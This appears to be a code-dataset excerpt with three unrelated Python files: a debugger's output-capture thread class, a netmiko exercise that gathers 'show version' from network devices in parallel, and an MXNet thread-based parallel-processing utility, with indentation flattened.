def __init__(self, whose, category, fd, stream):
assert category not in self.instances
self.instances[category] = self
log.info("Capturing {0} of {1}.", category, whose)
self.category = category
self._whose = whose
self._fd = fd
self._decoder = codecs.getincrementaldecoder("utf-8")(errors="surrogateescape")
if stream is None:
# Can happen if running under pythonw.exe.
self._stream = None
else:
self._stream = stream if sys.version_info < (3,) else stream.buffer
self._encode = codecs.getencoder(
"utf-8" if stream.encoding is None else stream.encoding
)
self._worker_thread = threading.Thread(target=self._worker, name=category)
self._worker_thread.start()
def __del__(self):
fd = self._fd
if fd is not None:
try:
os.close(fd)
except Exception:
pass
def _worker(self):
while self._fd is not None:
try:
s = os.read(self._fd, 0x1000)
except Exception:
break
if not len(s):
break
self._process_chunk(s)
# Flush any remaining data in the incremental decoder.
self._process_chunk(b"", final=True)
def _process_chunk(self, s, final=False):
s = self._decoder.decode(s, final=final)
if len(s) == 0:
return
try:
launcher.channel.send_event(
"output", {"category": self.category, "output": s.replace("\r\n", "\n")}
)
except Exception:
pass # channel to adapter is already closed
if self._stream is None:
return
s, _ = self._encode(s, "surrogateescape")
size = len(s)
i = 0
while i < size:
# On Python 2, all writes are full writes, and write() returns None.
# On Python 3, writes can be partial, and write() returns the count.
written = self._stream.write(s[i:])
self._stream.flush()
if written is None: # full write
break
elif written == 0:
# This means that the output stream was closed from the other end.
# Do the same to the debuggee, so that it knows as well.
os.close(self._fd)
self._fd = None
break
i += written
def wait_for_remaining_output():
"""Waits for all remaining output to be captured and propagated.
"""
for category, instance in CaptureOutput.instances.items():
log.info("Waiting for remaining {0} of {1}.", category, instance._whose)
instance._worker_thread.join()
|
exercise7.py | #!/usr/bin/env python
from net_system.models import NetworkDevice, Credentials
from netmiko import ConnectHandler
from datetime import datetime
from multiprocessing import Process, current_process
import django
def show_ver(device):
creds = device.credentials
conn_dev = ConnectHandler(
device_type=device.device_type,
ip=device.ip_address,
username=creds.username,
password=creds.password,
port=device.port)
outp = conn_dev.send_command("show version")
# print outp
conn_dev.disconnect()
def main():
django.setup()
start_time = datetime.now()
devices = NetworkDevice.objects.all()
procs = []
for device in devices:
my_proc = Process(target=show_ver, args=(device,))
my_proc.start()
procs.append(my_proc)
for a_proc in procs:
# print a_proc
a_proc.join()
print "Elapsed time {}".format(datetime.now() - start_time)
if __name__ == "__main__":
main()
|
parallel.py | # coding: utf-8
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Utility functions for parallel processing."""
import threading
try:
import Queue as queue
except ImportError:
import queue
__all__ = ['Parallelizable', 'Parallel']
class Parallelizable(object):
"""Base class for parallelizable unit of work, which can be invoked by `Parallel`.
The subclass must implement the `forward_backward` method, and be used
together with `Parallel`. For example::
class ParallelNet(Parallelizable):
def __init__(self):
self._net = Model()
self._loss = gluon.loss.SoftmaxCrossEntropyLoss()
def forward_backward(self, x):
data, label = x
with mx.autograd.record():
out = self._net(data)
loss = self._loss(out, label)
loss.backward()
return loss
net = ParallelNet()
ctx = [mx.gpu(0), mx.gpu(1)]
parallel = Parallel(len(ctx), net)
# Gluon block is initialized after forwarding the first batch
initialized = False
for batch in batches:
for x in gluon.utils.split_and_load(batch, ctx):
parallel.put(x)
losses = [parallel.get() for _ in ctx]
trainer.step()
"""
def forward_backward(self, x):
""" Forward and backward computation. """
raise NotImplementedError()
class Parallel(object):
"""Class for parallel processing with `Parallelizable`s. It invokes a
`Parallelizable` with multiple Python threads. For example::
class ParallelNet(Parallelizable):
def __init__(self):
self._net = Model()
self._loss = gluon.loss.SoftmaxCrossEntropyLoss()
def forward_backward(self, x):
data, label = x
mx.autograd.record():
out = self._net(data)
loss = self._loss(out, label)
loss.backward()
return loss
net = ParallelNet()
ctx = [mx.gpu(0), mx.gpu(1)]
parallel = Parallel(len(ctx), net)
for batch in batches:
for x in gluon.utils.split_and_load(batch, ctx):
parallel.put(x)
losses = [parallel.get() for _ in ctx]
trainer.step()
Parameters
----------
num_workers : int
Number of worker threads.
parallelizable :
Parallelizable net whose `forward` and `backward` methods are invoked
by multiple worker threads.
serial_init : bool, default True
Execute the first `num_workers` inputs in main thread, so that the `Block`
used in `parallizable` is initialized serially. Initialize a `Block` with
multiple threads may cause unexpected behavior.
"""
class _StopSignal(object):
"""Internal class to signal stop. """
def __init__(self, msg):
self._msg = msg
def __init__(self, num_workers, parallizable, serial_init=True):
self._in_queue = queue.Queue(-1)
self._out_queue = queue.Queue(-1)
self._num_workers = num_workers
assert self._num_workers > 0, 'num_workers must be positive'
self._threads = []
self._parallizable = parallizable
self._num_serial = num_workers if serial_init else 0
def _worker(in_queue, out_queue, parallel):
while True:
x = in_queue.get()
if isinstance(x, Parallel._StopSignal):
return
out = parallel.forward_backward(x)
out_queue.put(out)
arg = (self._in_queue, self._out_queue, self._parallizable)
for _ in range(num_workers):
thread = threading.Thread(target=_worker, args=arg)
self._threads.append(thread)
thread.start()
def put(self, x):
"""Assign input `x` to an available worker and invoke
`parallizable.forward_backward` with x. """
if self._num_serial > 0:
self._num_serial -= 1
out = self._parallizable.forward_backward(x)
self._out_queue.put(out)
else:
self._in_queue.put(x)
def get(self):
"""Get an output of previous `parallizable.forward_backward` calls.
This method blocks if none of previous `parallizable.forward_backward`
calls have return any result. """
return self._out_queue.get()
def __del__(self):
for thread in self._threads:
if thread.is_alive():
self._in_queue.put(self._StopSignal('stop'))
for thread in self._threads:
thread.join(10)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.